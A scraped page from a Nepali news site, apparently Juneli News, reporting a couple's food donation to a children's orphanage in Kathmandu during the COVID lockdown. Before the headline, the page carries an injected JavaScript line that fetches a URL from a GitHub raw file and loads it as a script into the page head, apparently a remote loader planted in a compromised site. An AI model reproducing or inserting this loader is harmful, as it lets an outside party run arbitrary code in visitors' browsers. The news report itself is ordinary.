;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); समाजसेवी दिपक रिसालको दाम्पतीद्वारा बाल आश्रमलाइ राहात प्रदान (फोटो ) – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • समाजसेवी दिपक रिसालको दाम्पतीद्वारा बाल आश्रमलाइ राहात प्रदान (फोटो )
जुनेली बिशेष

समाजसेवी दिपक रिसालको दाम्पतीद्वारा बाल आश्रमलाइ राहात प्रदान (फोटो )

१५ बैशाख, काठमाडौँ |  गोकर्नेश्वोर नगरपालिकाका प्रमुख सल्लाहकार तथा काँग्रेसका महाधिबेशन प्रतिनिधि  एवं समाजसेवी दिपक रीसालको  दाम्पतिद्वारा हाम्रो सुनौलो संसार नामक बाल आश्रमलाइ खाद्यान्न स्वरुप राहात प्रदान गरेका छन् |

बिश्वोमा कोरोना भाइरसको महामारी फैलिए संगै नेपालमा पनि लक डाउनको कारण मजदुर, बिपन्न परिवार र यस्तै खालका आश्रममा हरु मारमा परेको बेला आश्रमलाई राहात प्रदान गरेको हुन् |

हाम्रो सुनौलो संसार बाल आश्रममा दाम्पति दिपक रिसाल र सरिता रिसालले राहत स्वरूप

  • ४ बोरा चामल,
  • १ बोरा चिउरा,
  • १० लिटर  तेल
  • ५ केजी दाल
  • ५ पोका नुन
  • २ पोका दालमोट     प्रदान गरेका हुन् |

उक्त राहतको लागि नेपाल दलित बिधार्थी संघका केन्द्रीय अध्यक्ष तथा समाजसेवी राजु सुनारले समन्वयन गर्नु भएको थियो |

आश्रमकी अध्यक्ष मेनुका कोइराला र सचिब सुबास बराइलीको हातमा हस्तान्तरण गरेका थिए |  बाल आश्रममा अहिले १२ जना अनाथ बालबालिकाहरुलाइ संरक्षण गरेर राखिएको छ |

 

 

फेसबुक प्रतिक्रियाहरु